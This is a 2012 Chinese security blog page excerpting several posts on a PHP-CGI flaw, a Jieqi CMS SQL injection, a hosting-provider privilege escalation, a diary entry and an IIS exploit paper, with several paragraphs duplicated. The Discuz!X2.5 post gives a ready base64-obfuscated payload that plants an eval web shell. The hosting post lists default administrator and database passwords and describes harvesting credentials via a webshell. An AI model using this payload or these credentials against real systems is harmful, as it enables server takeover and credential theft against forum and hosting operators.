小站文章部分转自网络,若侵犯了作者权益,请及时与我联系删除,转载小站原创文章请注明出处。
Flash Player文件6,May,2012 | (204/1)PHP CGI Argument Injection Exploit CVE-2012-1823
From:90sec
PHP处理参数的传递时存在漏洞,在特定的配置情况下,远程攻击者可能利用此漏洞在服务器上获取脚本源码或执行任意命令。
当PHP以特定的CGI方式被调用时(例如Apache的mod_cgid),php-cgi接收处理过的查询格式字符串作为命令行参数,允许命令行开关(例如-s、-d 或-c)传递到php-cgi程序,导致源代码泄露和任意代码执行。FastCGI不受影响。
PHP处理参数的传递时存在漏洞,在特定的配置情况下,远程攻击者可能利用此漏洞在服务器上获取脚本源码或执行任意命令。
当PHP以特定的CGI方式被调用时(例如Apache的mod_cgid),php-cgi接收处理过的查询格式字符串作为命令行参数,允许命令行开关(例如-s、-d 或-c)传递到php-cgi程序,导致源代码泄露和任意代码执行。FastCGI不受影响。
28,Apr,2012 | (207/4)Discuz!X2.5 Release 20120407 Getshell 0day
影响版本有:20120407,beta,rc
1.注册任意账户
2.登陆用户,发表blog日志(注意是日志)
3.添加图片,选择网络图片,地址:{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}}
4.访问日志,论坛根目录下生成demo.php,一句话密码c
[转载自lcx.cc,本人未进行测试。]
24,Apr,2012 | (284/3)西部数码虚拟主机提权思路
Author:cfking
当前思路也可用于其他虚拟主机。
说明 西部数码虚拟主机安装后默认s-u的LocalAdministrator用户密码为root3306
就算修改了也是可以读取ini文件得到加密密码的
mysql 的root密码在安装过程中会提示是否修改 默认也是为root3306 或者 123456
在这些服务安装的过程中西部数码给这些服务都是低权限运行的。所以无法使用一些webshell集成的s-u EXP来提权
这里我写了一个脚本专门针对这种虚拟主机提权用的! ^_^`
值得一说的是在该虚拟主机并未删除Wscript.Shell组建。不过很杯具的是我没有找到执行目录.
所以我才整出了这个东西出来嘿嘿。
该虚拟主机默认软件安装路径:d:\SOFT_PHP_PACKAGE\ 在该目录下setup.ini配置文件中记录着mysql root 密码 site.xml 记录着网站配置信息(3.0以前的版本)
3.0版本现在集成到了access数据库中 也是存放在 默认安装路径下的iistool.dat 文件中 用户权限也是 users组可读 这样我们就可以利用webshell获取到各种信息了哈哈(这个其实是一个access数据库文件 他的连接密码为:www@west263@cn )
当前思路也可用于其他虚拟主机。
说明 西部数码虚拟主机安装后默认s-u的LocalAdministrator用户密码为root3306
就算修改了也是可以读取ini文件得到加密密码的
mysql 的root密码在安装过程中会提示是否修改 默认也是为root3306 或者 123456
在这些服务安装的过程中西部数码给这些服务都是低权限运行的。所以无法使用一些webshell集成的s-u EXP来提权
这里我写了一个脚本专门针对这种虚拟主机提权用的! ^_^`
值得一说的是在该虚拟主机并未删除Wscript.Shell组建。不过很杯具的是我没有找到执行目录.
所以我才整出了这个东西出来嘿嘿。
该虚拟主机默认软件安装路径:d:\SOFT_PHP_PACKAGE\ 在该目录下setup.ini配置文件中记录着mysql root 密码 site.xml 记录着网站配置信息(3.0以前的版本)
3.0版本现在集成到了access数据库中 也是存放在 默认安装路径下的iistool.dat 文件中 用户权限也是 users组可读 这样我们就可以利用webshell获取到各种信息了哈哈(这个其实是一个access数据库文件 他的连接密码为:www@west263@cn )
23,Apr,2012 | (202/2)杰奇CMS (<=1.7) SQL注入漏洞
Author:蓝孩
整个系统核心代码是zend加密的,dezend之后看了一下。先从最几率最大的select型注入看起,但是发现所有地方GET过去的参数,最后都会带入\lib\database\database.php中组合SQL语句,再带入到jieqimysqldatabase类(\lib\database\mysql\db.php)的query方法进行最后的执行。仔细查看后发现不可利用,因为如果是数字型的变量,带入到database.php时会进行is_numeric检查;如果是字符串型会进行\转义,尝试了宽字节注入,但很可惜的是dp.php中有一句“character_set_client=binary”,也就是说php程序在与mysql交互的时候使用二进制字符集查询,瞬间绝望了。再留意了一下,发现程序中并没有转码的操作,所以宽字节注入这条路就彻底不行了。这是一个不好的信号,因为程序中基本上所有的字符串型都会进行转义操作,我就不可能跳出魔术引号了。又黑盒看了一下,后台的一个地方会显示用户留言时的IP,IP是插在数据库中的,于是考虑了一下能不能伪造IP,看看能否利用来注入或者xss。分析之后得出获取IP函数是jieqi_userip (/global.php),采用HTTP_CLIENT_IP的方式来获取的,可以伪造,但很蛋疼的是jieqi_userip在获取了IP之后会把小数点替换为空,再进行is_numeric判断 - - || ,又白高兴了。接着找了一下xss,1.7没有找到xss,1.6有几个反射型xss。再接再厉,又看了一下其他一些地方,但都没太大的突破,最后看到注册那一块的时候,发现了一些问题。处理注册的页面是/register.php,post过去的参数有username、password、repassword、email、sex、qq、url、action,跟了一下,发现是这样一个流程:依次带入到/regcheck.php中检查username是否合法,username是否重复,password是否等于repassword,email是否合法,email是否重复。也就是说sex、qq、url并没有进行检查,但是qq和url在数据库中是varchar型,cms会把这两个参数当字符串处理,也就是说如果出现单引号的话会进行转义,前面已经说过了,无法跳出魔术引号。很幸运的是,程序猿百密一疏,天真的认为sex在前台是以单选框显示出来的,只有0、1、2这三种可能性,所以没进行is_numeric判断,直接带入到数据库中,那么就可以利用了。
整个系统核心代码是zend加密的,dezend之后看了一下。先从最几率最大的select型注入看起,但是发现所有地方GET过去的参数,最后都会带入\lib\database\database.php中组合SQL语句,再带入到jieqimysqldatabase类(\lib\database\mysql\db.php)的query方法进行最后的执行。仔细查看后发现不可利用,因为如果是数字型的变量,带入到database.php时会进行is_numeric检查;如果是字符串型会进行\转义,尝试了宽字节注入,但很可惜的是dp.php中有一句“character_set_client=binary”,也就是说php程序在与mysql交互的时候使用二进制字符集查询,瞬间绝望了。再留意了一下,发现程序中并没有转码的操作,所以宽字节注入这条路就彻底不行了。这是一个不好的信号,因为程序中基本上所有的字符串型都会进行转义操作,我就不可能跳出魔术引号了。又黑盒看了一下,后台的一个地方会显示用户留言时的IP,IP是插在数据库中的,于是考虑了一下能不能伪造IP,看看能否利用来注入或者xss。分析之后得出获取IP函数是jieqi_userip (/global.php),采用HTTP_CLIENT_IP的方式来获取的,可以伪造,但很蛋疼的是jieqi_userip在获取了IP之后会把小数点替换为空,再进行is_numeric判断 - - || ,又白高兴了。接着找了一下xss,1.7没有找到xss,1.6有几个反射型xss。再接再厉,又看了一下其他一些地方,但都没太大的突破,最后看到注册那一块的时候,发现了一些问题。处理注册的页面是/register.php,post过去的参数有username、password、repassword、email、sex、qq、url、action,跟了一下,发现是这样一个流程:依次带入到/regcheck.php中检查username是否合法,username是否重复,password是否等于repassword,email是否合法,email是否重复。也就是说sex、qq、url并没有进行检查,但是qq和url在数据库中是varchar型,cms会把这两个参数当字符串处理,也就是说如果出现单引号的话会进行转义,前面已经说过了,无法跳出魔术引号。很幸运的是,程序猿百密一疏,天真的认为sex在前台是以单选框显示出来的,只有0、1、2这三种可能性,所以没进行is_numeric判断,直接带入到数据库中,那么就可以利用了。
23,Apr,2012 | (190/3)随笔 4.23
最近心情挺凌乱的,做什么事情都打不起精神来,可能是我太脆弱了吧,遇到挫折就被击垮了。
前几天去大连考专科没有考上,去铁岭考也是心不在焉,归根到底还是我以前没有好好学习,现在想起来挺后悔的,终于能体会小的时候家人总是和我说:“不好好学习你就等着后悔吧”。 可是后悔有什么用呢,自己的路都是自己选得,但是,既然错了一次,那就不要再继续错下去了,未来的人生道路还很长,我还有机会,我还可以拼搏,只要不再让自己后悔,便好。
这几天呢,自己在家休息,上网听歌聊天逛论坛,说实话已经好久没有去看,去学习技术上的东西了,也许人一旦习惯某种现状,就开始变得懒惰了吧,看着大家天天讨论技术,无时不刻的在进步,心里也挺有压力的,总不能什么事都落在别人的后边吧,但是大学没有考上,真的没有什么心情去搞技术,只能去想着文化课,唉,只好等录取定下来了,心里的一块石头放下来,才好去全身心的投入爱好吧。
前几天去大连考专科没有考上,去铁岭考也是心不在焉,归根到底还是我以前没有好好学习,现在想起来挺后悔的,终于能体会小的时候家人总是和我说:“不好好学习你就等着后悔吧”。 可是后悔有什么用呢,自己的路都是自己选得,但是,既然错了一次,那就不要再继续错下去了,未来的人生道路还很长,我还有机会,我还可以拼搏,只要不再让自己后悔,便好。
这几天呢,自己在家休息,上网听歌聊天逛论坛,说实话已经好久没有去看,去学习技术上的东西了,也许人一旦习惯某种现状,就开始变得懒惰了吧,看着大家天天讨论技术,无时不刻的在进步,心里也挺有压力的,总不能什么事都落在别人的后边吧,但是大学没有考上,真的没有什么心情去搞技术,只能去想着文化课,唉,只好等录取定下来了,心里的一块石头放下来,才好去全身心的投入爱好吧。
15,Apr,2012 | (271/1)Microsoft IIS 7.5 remote heap buffer overflow
|=---------------------------------------------------------------------------------=|
|=-------------=[ The Art of Exploitation ]=----------------=|
|=---------------------------------------------------------------------------------=|
|=----------------=[ Exploiting MS11-004 ]=------------------------=|
|=-----=[ Microsoft IIS 7.5 remote heap buffer overflow ]=----=|
|=---------------------------------------------------------------------------------=|
|=------------------------=[ by redpantz ]=------------------------------=|
|=---------------------------------------------------------------------------------=|
--[ Table of Contents
|=-------------=[ The Art of Exploitation ]=----------------=|
|=---------------------------------------------------------------------------------=|
|=----------------=[ Exploiting MS11-004 ]=------------------------=|
|=-----=[ Microsoft IIS 7.5 remote heap buffer overflow ]=----=|
|=---------------------------------------------------------------------------------=|
|=------------------------=[ by redpantz ]=------------------------------=|
|=---------------------------------------------------------------------------------=|
--[ Table of Contents
